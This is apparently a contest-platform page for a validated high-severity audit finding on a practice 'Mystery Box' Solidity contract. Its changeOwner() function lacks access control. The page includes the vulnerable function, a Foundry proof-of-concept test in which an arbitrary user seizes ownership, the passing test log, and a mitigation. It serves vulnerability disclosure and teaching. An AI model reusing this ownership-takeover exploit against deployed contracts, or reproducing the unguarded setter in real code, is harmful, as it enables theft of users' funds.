Mystery Box

First Flight #25

Beginner FriendlyFoundry

100 EXP

View results

Previous Next

Submission Details

Severity: high

Valid

`MysteryBox::ChangeOwner()` has no Access Control

0xtimefliez

Description:

Impact: High
Likelihood: High

The MysteryBox::changeOwner() function is publicly callable without any restrictions and allows any user to claim ownership of the contract resulting in being able to execute privileged functions.

Vulnerable Code:

function changeOwner(address _newOwner) public {

owner = _newOwner;

}

Impact:

Any user can claim ownership and in the worst case scenario call MysteryBox::withdrawFunds(), which allows any said user to withdraw all paid fees.

Tools Used:

Manual Review, Foundry Forge

Proof of Concept:

The following test demonstrates how an arbitrary user can call MysteryBox::changeOwner() to take control over the protocol and gain access to sensitive functions like MysteryBox::withdrawFunds:

function testExploitOwnershipTransfer() public {

console.log("Initial Owner at deploment", mysteryBox.owner());

console.log("Malicious user calling changeOwner()", address(user1));

vm.startPrank(user1);

mysteryBox.changeOwner(address(user1));

vm.stopPrank();

console.log("New Owner of MysteryBox", mysteryBox.owner());

assertEq(mysteryBox.owner(), address(user1));

}

Ran 1 test for test/TestMysteryBox.t.sol:MysteryBoxTest

[PASS] testExploitOwnershipTransfer() (gas: 24524)

Logs:

Reward Pool Length: 4

Initial Owner at deploment 0x7c8999dC9a822c1f0Df42023113EDB4FDd543266

Malicious user calling changeOwner() 0x0000000000000000000000000000000000000001

New Owner of MysteryBox 0x0000000000000000000000000000000000000001

Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 645.40µs (98.20µs CPU time)

Recommended Mitigation:

Employ following require, as in the remaining privileged functions:
require(msg.sender == owner, "Only owner can withdraw");

2. Consider using a modifier to make your code more readable.

Updates

Appeal created

inallhonesty Lead Judge 8 months ago

Submission Judgement Published

Validated

Assigned finding tags:

Anyone can change owner

Rewards breakdown

nSLOC

This contest has a flat reward structure with the following payouts:

High

100 EXP

Medium

20 EXP

Low

2 EXP

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being carefully reviewed by our judges.

View all submissions

Appeals

This is your time to appeal against judgements on your submissions.

Appeals Review

Appeals are being carefully reviewed by our judges.

Rewards Distribution

The contest is complete and the rewards are being distributed.

View results

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.